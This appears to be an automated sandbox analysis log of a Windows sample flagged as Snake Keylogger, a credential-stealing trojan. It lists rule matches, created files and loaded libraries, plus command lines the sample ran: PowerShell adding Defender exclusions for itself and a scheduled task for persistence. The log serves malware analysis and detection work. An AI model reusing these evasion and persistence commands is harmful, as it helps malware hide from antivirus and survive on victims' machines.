Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07038E08	20_2_07038E08
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703F620	20_2_0703F620
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703FA6A	20_2_0703FA6A
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07039E71	20_2_07039E71
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703FA78	20_2_0703FA78
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07032278	20_2_07032278
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07035280	20_2_07035280
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703E917	20_2_0703E917
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703E918	20_2_0703E918
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07032962	20_2_07032962
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703ED70	20_2_0703ED70
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07039590	20_2_07039590
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703F1C8	20_2_0703F1C8
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07038DF9	20_2_07038DF9
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703DC01	20_2_0703DC01
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703DC10	20_2_0703DC10
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07030031	20_2_07030031
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07030040	20_2_07030040
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703E067	20_2_0703E067
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703E068	20_2_0703E068
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703E4BF	20_2_0703E4BF
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703E4C0	20_2_0703E4C0

Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1278452695.00000000005DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1289770203.00000000065B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1280413561.00000000024C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1280413561.00000000024A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.0000000003479000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1291849942.0000000007200000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732851560.0000000000D37000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Binary or memory string: OriginalFilenamewxHw.exe6 vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GhrKoSGuCdvpJ.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, -O--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, -O--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, -O--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, -O--.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, HecPmJ6gFWvqumjiqv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, qoqZYWktJStci6f29S.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, qoqZYWktJStci6f29S.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, qoqZYWktJStci6f29S.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, qoqZYWktJStci6f29S.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, qoqZYWktJStci6f29S.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, qoqZYWktJStci6f29S.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, HecPmJ6gFWvqumjiqv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@3/3

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

File created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

File created: C:\Users\user\AppData\Local\Temp\tmp8289.tmp

Jump to behavior

Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002FE9000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000003028000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002FD9000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.000000000301C000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000034AF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Virustotal: Detection: 60%
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

File read: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process created: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
